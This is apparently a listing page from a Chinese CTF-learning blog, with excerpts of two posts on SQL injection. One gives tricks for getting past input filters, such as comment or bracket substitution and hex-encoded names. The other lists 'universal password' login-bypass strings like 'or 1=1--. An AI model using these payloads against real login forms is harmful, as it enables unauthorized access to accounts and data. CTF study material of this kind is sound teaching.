CTF学习 【CTFWeb】SQL注入通杀大招 2022-10-04 站长-小松 0 过滤解决方案过滤空格, 可以使用括号() 或者注释 绕过过滤and, 可以使用or替代过滤union, 可以用盲注替代联合注入过滤逗号, 可以使用特殊语法绕过, 比如:substr(database(),1,1) 可以用substr(database() from 1 for 1)来代替盲注时,表名库名等名称请用16进制转换,前加 0x 后再进...
CTF学习 【CTFWeb】万能密码大全 2022-10-04 站长-小松 0 常见万能密码:"or "a"="a'.).or.('.a.'='.aor 1=1--'or 1=1--a'or' 1=1--"or 1=1--'or.'a.'='a"or"="a'='a'or''=''or'='or'admin'or 1=1#'='&password='='admin' or 1=1#admin'//or//1=1#admin'/**...